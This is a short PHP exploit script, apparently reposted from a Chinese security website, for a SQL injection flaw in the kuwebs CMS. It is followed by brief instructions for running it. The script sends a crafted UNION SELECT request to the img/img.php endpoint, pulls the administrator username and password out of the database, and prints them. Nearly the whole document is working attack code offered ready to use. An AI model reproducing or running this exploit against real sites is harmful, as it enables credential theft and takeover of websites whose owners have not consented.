<?php error_reporting(E_ERROR); print_r(' +---------------------------------------------------------------------+ kuwebs cms sql injection exp Home: www.hkmjj.com www.2cto.com +---------------------------------------------------------------------+ ');
if ($argc < 2) { print_r(' Usage: php '.$argv[0].' host /path Example: php '.$argv[0].' 127.0.0.1 cc '); die(); } ob_start(); $host = $argv[1]; $path= $argv[2]; $sock = fsockopen($host, 80, $errno, $errstr, 30); if (!$sock) die("$errstr ($errno)\n"); fwrite($sock, "GET /$path/img/img.php?lang=cn&itemid=58%20and%201=2%20union%20select%201,concat(0x6F756F757E,adminuser,0x2D,adminpassword,0x7E31),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35+from+kuwebs_admin%20-- HTTP/1.1\r\n"); fwrite($sock, "Host: $host\r\n"); fwrite($sock, "User-Agent: Mozilla/5.0 (Windows NT 5.2; rv:6.0.2) Gecko/20100101 Firefox/6.0.2\r\n"); fwrite($sock, "Accept: text/ html ,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\n"); fwrite($sock, "Accept-Language: zh-cn,zh;q=0.5\r\n"); fwrite($sock, "Connection: keep-alive\r\n\r\n"); $headers = ""; while ($str = trim(fgets($sock, 1024))) $headers .= "$str\n"; $body = ""; while (!feof($sock)) $body .= fgets($sock, 1024); fclose($sock); ob_end_flush(); //print_r($body); if (strpos($body, 'ouou') !== false) { preg_match('/ouou~(.*?)~1/', $body, $arr); $result=explode("-",$arr[1]); print_r("Exploit Success! \nusername:".$result[0]."\npassword:".$result[1]."\n");
} else{ print_r("Exploit Failed! \n"); } ?>
保存 exp.php 运行
php.exe exp.php 127.0.0.1
from:hkmjj.com
查看更多关于kuwebs 0day及修复 - 网站安全 - 自学php的详细内容...